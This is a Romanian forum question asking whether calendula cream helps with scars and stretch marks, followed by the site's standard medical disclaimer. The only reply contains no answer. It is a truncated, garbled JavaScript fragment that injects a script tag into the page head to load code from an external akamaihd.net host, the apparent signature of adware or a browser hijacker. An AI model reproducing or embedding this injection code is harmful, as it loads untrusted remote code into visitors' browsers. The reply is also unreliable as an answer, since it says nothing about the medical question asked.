| AnonimuFrumos a întrebat:

Din câte am auzit, crema de gălbenele este foarte buna în mai multe lucruri. Am auzit însă ca ajuta la cicatrici și la vergeturi ( care tot niște cicatrici sunt ). E adevărat? Ajuta la vergeturi?

Fundă!

Atenţie! Problemele de natură medicală sunt probleme serioase care necesită asistenţă/consult specializat. Sugestiile date de utilizatorii TPU au doar o valoare orientativă şi în nici un caz nu exclud consultul profesional medical. Prin urmare vă recomandăm să apelaţi la personal medical specializat atât pentru diagnosticare, cât şi pentru tratament.
1 răspuns:
| gabby77 a răspuns:

Javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head"); if(a. length){var d=document.createElement("script"); d.src="https://apibrowseburstco-a.akamaihd.net/......ttps?/gsrs a[0].appendC